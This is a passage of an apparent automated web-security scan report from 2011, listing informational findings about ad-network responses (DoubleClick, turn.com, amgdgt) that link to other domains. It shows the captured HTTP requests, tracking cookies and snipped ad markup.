Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679940&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661940967&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303661940980&frm=1&adk=2614322350&ga_vid=1707812897.1303661941&ga_sid=1303661941&ga_hid=785527466&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36813005&fu=4&ifi=1&dtd=16
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU4Ho4GhMNTO2javi9DkYkdWBJL5gDA3gBY2BgEGJg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HawMHVK4NKPcdKOcCl5Nwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiJOucoyXwamyaEMrA5PGBh18hgYPgr9BwJQHOUHMFYzMPnbMLC88GZg1GJiYLj0DBZHacqzgoByVlA5RqDcA7ickpQ6kM2I285uIaA8g._mDAYGDmCC2MkIVMwQeIuRCUgxGDAy8DMwKJiBBZcWgAVZMhlZgXIsIUysjGxAhvwuRgYueDoCGcYAAOS4gxQ-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUWF_DD0u2mL445Kc9YoToMfDv8fQDA3gBY2BgEGZg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36H34QQnHKuDRxQuTagvu9AfS5wfRLut3Hqk7DTxqWv_eTOTbj0tZ.cUYtT7oTwYpxyxxY8wil39KsgTrkZC9hxy9m24pSb_tATt1zHStxypro45abdVMQpV1nmy8A0OZSB1eEJA6NOHgPDR6H_QACKv_wAxmoGJn8bBpYX3gyMWkwMDJeeweIoTXlWEFDOCirHCJR7AJdTklIHshlx29ktBJRn8N2cwcDAAUwsOxmBihkCbzEyASkGA0YGAQYGBTOw4NICsCBLJiMrUI4lhImVkQ3IkN_FyMAFT2MgwxgAToqJtQ--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:19:00 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4054
Date: Sun, 24 Apr 2011 16:19:00 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1328357053?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4BYzzRrrTdej4JWAfsQb4gI__KtnZW8sdXNhLHQsMTMwMzY2MTk0MDgyMSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1adVQtYW1abVptWm01UHdBQUFFQXpNd2RBeFNDd2NtZ1I2VF9GSUxCeWFCSHBQeTh1a29EUjBua2tTc1lkYTZiMnppVnlUYlJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUd3OEJBZ1VDQUFRQUFBQUF6Q0wxcHdBQUFBQS4vY25kPSFReEZyX3dpUW1RTVF4c2tLR0FBZzBjY0JLRXN4NHBuRDYyZ1I2VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJib0puY2syMFRjaWxBc0hqbFFlRnZQMzRBdGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDWk1BQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0d1ZyTUhLS1pWZW1SbTVYRkxhT1NHT1ZBTEpQZyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
QUNCTWdDaGRMUENxZ0RBZWdEdkFIb0E1UUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHdWck1IS0taVmVtUm01WEZMYU9TR09WQUxKUGcmY2xpZW50PWNhLXB1Yi02ODg4MDY1NjY4MjkyNjM4JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=1328357053" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=72849306" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.12. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Apr 21 18:16:06 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
HPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29"><img src="http://s0.2mdn.net/3095006/mpcs_040111_160x600_gm_android_1_fl.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.13. http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3016.158901.DATAXU/B5398270.22

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6373

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Mar 28 18:52:11 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.mazdausa.com/MusaWeb/displayPage.action?pageParameter=modelsMain&vehicleCode=CX7&campId=13300&providertag=MazdaMedia&servicetag=T1CX70107110"><img src="http://s0.2mdn.net/690331/1-CX7_Price_FAILOVER_Rulebreaker_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.14. http://ad.doubleclick.net/adi/N3285.turn/B2343920.7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.turn/B2343920.7

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3285.turn/B2343920.7;sz=160x600;ord=8440323269241723068?;click=http://r.turn.com/r/tpclick/id/vNidbEsNInUS2QkABQIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5083

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
e0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D60351999-236743474-40772420"><img src="http://s0.2mdn.net/1420759/cls_edu_Ebay_Pass50BtnAnimHowardBluFillBd15s40k_RetGrant_SQ_0211_160x600.gif" width="160" height="600" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

23.15. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.Google/B5102071.8

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3671.Google/B5102071.8;sz=160x600;pc=gdnHwu80gEAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BfYqAHEy0TbPrEcuBlgeC9vCrAseG85QCx7X3yR3AjbcB8LT4ARABGAEg2aK3DzgAUPuY1pwHYMnug4jwo-wSoAGhvOPWA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YrgCGMgC94qgG6gDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=;ord=1061289247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661599233&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661599239&frm=1&adk=2614322350&ga_vid=1010643910.1303661599&ga_sid=1303661599&ga_hid=1918276477&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7335
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:13:17 GMT
Expires: Sun, 24 Apr 2011 16:13:17 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Sat Apr 02 18:55:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
OmdxAz1pjoA7wB6AOUAvUDAAAAxA&num=1&sig=AGiWqty58OsInd0vwE_hq6qLB0DF4PWwgw&client=ca-pub-6888065668292638&adurl=http%3a%2f%2fwww.homeaway.com%3Fcid%3DB_Detourism_BR_T_160x600_HotelDeckChair_LHP_469252"><img src="http://s0.2mdn.net/2558639/Minister_Standard_Space_160x600_JPG_1.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.16. http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.turn.com/B5269631.6

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3905.turn.com/B5269631.6;sz=160x600;ord=8461559076100471709?;click=http://r.turn.com/r/tpclick/id/nXvzACZ_bXWccgsA-gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7635
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:20:46 GMT
Expires: Sun, 24 Apr 2011 16:20:46 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Sun Feb 20 13:37:06 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
MgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http%3a%2f%2fgorving.com/watch-video/default.aspx"><img src="http://s0.2mdn.net/2638209/1-160X600_20_grv_wvb_d.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.17. http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.turn.com/B5269631.6

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3905.turn.com/B5269631.6;sz=160x600;ord=2809293250540149997?;click=http://r.turn.com/r/tpclick/id/7RxZvFOd_CaL8gwA-wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680301&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662301770&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662301772&frm=1&adk=2614322350&ga_vid=1987845434.1303662302&ga_sid=1303662302&ga_hid=1938999785&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:25:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7635

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Sun Feb 20 13:38:54 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
MgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http%3a%2f%2fgorving.com/watch-video/default.aspx"><img src="http://s0.2mdn.net/2638209/1-160X600_20_grv_wvr_d.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.18. http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.turn.com/B5269631.6

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

